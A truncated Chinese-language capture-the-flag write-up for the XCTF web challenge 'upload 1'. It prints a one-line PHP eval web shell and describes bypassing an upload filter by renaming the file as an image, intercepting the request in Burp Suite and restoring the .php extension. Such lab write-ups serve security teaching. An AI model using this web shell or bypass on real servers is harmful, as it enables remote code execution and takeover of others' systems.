XCTF-Web|upload 1詳細WriteUp

獲取在線場景,得到: 聯想可能是要上傳webshell。於是編寫一句話木馬腳本: <?php @eval($_POST['flag']);?> 當直接上傳.php文件時,顯示: 可知需要修改文件後綴,成爲圖片格式 將一句話木馬的文件後綴改爲.png或.jpg 選擇文件,開啓burpsuite攔截器,上傳文件: 在filename處修改文件後綴名爲.php,全選數據包後右鍵,點擊send to re
相關文章
相關標籤/搜索